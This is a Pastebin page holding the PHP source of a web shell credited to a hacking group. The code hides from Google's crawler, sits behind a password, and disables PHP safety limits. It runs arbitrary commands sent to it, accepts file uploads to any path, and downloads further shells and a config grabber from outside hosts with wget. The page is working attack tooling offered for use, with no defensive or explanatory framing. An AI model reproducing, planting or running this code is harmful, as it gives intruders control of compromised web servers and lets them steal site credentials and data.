Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <? /* SIMPLE MINI WEB5HELL V0.5 | AUTHOR : AZZATSSIN'S CYBERSERKER */
- if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- $auth_pass = "ed4544d345562697a49e5cfc6a8ab545";
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- function printLogin() {
- error_reporting(0); echo'<meta content=SIMPLE WEB5HELL-BY-AZZATSSINS-CYBERSERKERS name=description>
- <head><title>JIGOKU TSUSHIN</title></head><head>
- <body bgcolor=black><center><a href=mailto:[email protected]><img src=http://jigoku.magix.net/images/homeimage.png></a></center><br>
- <center>
- <form method=post>
- <input type=text style=background-color:black; color:red; name=pass>
- <br>
- <input type=submit value=Send>
- </form></center>';
- exit;
- }
- if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) {
- if( empty( $auth_pass ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) {
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- } else {
- printLogin();
- }
- }
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- $phi=fopen("php.ini","w+");
- fwrite($phi,"safe_mode = Off
- disable_functions = NONE
- safe_mode_gid = OFF
- open_basedir = OFF ");
- echo"<title>SIMPLE WEB5HELL V0.5</title><head><style type='text/css' media='all,handheld'/>
- body{
- background-color:#878787;
- background-image: url('http://azzat.wap.mu/files/1049320/matrix-azzatssins.gif');
- background-repeat: repeat;
- background-position: center;
- background-attachment: fixed;
- font-family: Comic Sans;
- font-color: #FFFFFF;
- font-size: 25px;
- text-align: center;
- }
- input, select{
- background:#002222;
- padding:3px;
- border-radius:3px;
- color:#fee908;
- border:2px dotted #00ff00; width: 250px;
- }
- .login{
- background: none repeat scroll 0% 0% rgb(105, 167, 78);
- border-color: rgb(152, 195, 125) rgb(59, 110, 34) rgb(44, 81, 21);
- color: rgb(255, 255, 255);
- }
- .login {
- font-size: 13px;
- line-height: 23px;
- }
- </style>
- <body bgcolor=silver><br>"; echo '<b><i><font color="orange">Disable Function:</font></i></b>';
- if(ini_get('disable_functions') == ''){
- echo ' <font color="green"> None</font>';
- }
- else{
- echo '<font color="red">';
- echo ini_get('disable_functions');
- echo '</font>';
- }
- echo"<br><fieldset><a href=?web=shell><img src=http://azzat.wap.mu/files/1049320/az-bn-idb.png width=128px height=128></a>
- <a href=?system=command><img src=http://cdn.osxdaily.com/wp-content/uploads/2014/08/terminal-icon-osx-300x262.png width=128px height=128></a><a href=?symbolic=link><img src=http://iconizer.net/files/Devine_icons/thumb/128/Folder-Links.png width=128px height=128></a><a href=?file=uploader><img src=https://cdn2.iconfinder.com/data/icons/windows-8-metro-style/512/upload.png width=128px height=128></a><a href=?mysql=connect><img src=https://dn-linuxcn.qbox.me/data/attachment/album/201407/28/155012q9p55wfwupyfejie.png width=128px height=128></a><a href=?config=grabber><img src=https://cdn2.iconfinder.com/data/icons/windows-8-metro-style/512/data_configuration.png width=128px height=128></a></fieldset>"; if($_GET['system']=="command"){ echo'<center><br><font color=violet><b><i>COMMAND</i></b></font><br><form method="post">
- <label>
- <input type="text" name="cmd" style="background-color:#000000; color:#de0100; font-family:Corbel;" value=""></label>
- <label>
- <input type="submit" name="Submit" value="Execute" />
- </label>
- <br><textarea name="textarea" style="width:14cm; height:5cm; background-color:#576557; color:#6fd800;">
- '; if(isset($_POST['cmd']))
- {
- $cmd = $_POST['cmd'];
- if($cmd == "")
- {
- echo " Please Insert Command!";
- }
- elseif(isset($cmd))
- {
- $output = system($cmd);
- printf("$output\n");
- }
- }
- echo'</textarea>
- </form>
- <br><br></center>'; } if($_GET['symbolic']=="link"){ system('wget http://x-x-x.yn.lt/py');system('mv py symlink.py');system('python symlink.py');system('rm symlink.py'); echo'<meta http-equiv="Refresh" content= "0; url=sl">'; } if($_GET['web']=="shell"){ system('wget http://x-x-x.yn.lt/v5'); system('mv v5 v5.php'); echo'<meta http-equiv="Refresh" content= "0; url=v5.php">';
- } if($_GET['file']=="uploader"){ echo'<center><br><b>'.php_uname().'</b><br>';
- echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
- echo '<input name="uploadto" type="text" size="80" value="'.getcwd().'"><br />';
- echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></center>';
- if( $_POST['_upl'] == "Upload" ) {
- if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) {
- echo '<center><b><a href=mailto:[email protected]>Upload success!</a></b></center><br>'.$_POST['uploadto']."/".$_FILES['file']['name'];
- } else {
- echo '<center><b><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>Upload failed!</a></b></center>'; }
- }} if($_GET['mysql']=="connect"){ system('wget http://wget.yu.tl/files/mysql.css'); system('mv mysql.css mysql.php'); echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
- } if($_GET['config']=="grabber"){ system('wget http://wget.yu.tl/files/conf.zip'); system('mv conf.zip conf.php'); echo'<meta http-equiv="Refresh" content= "0; url=conf.php">';
- } ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement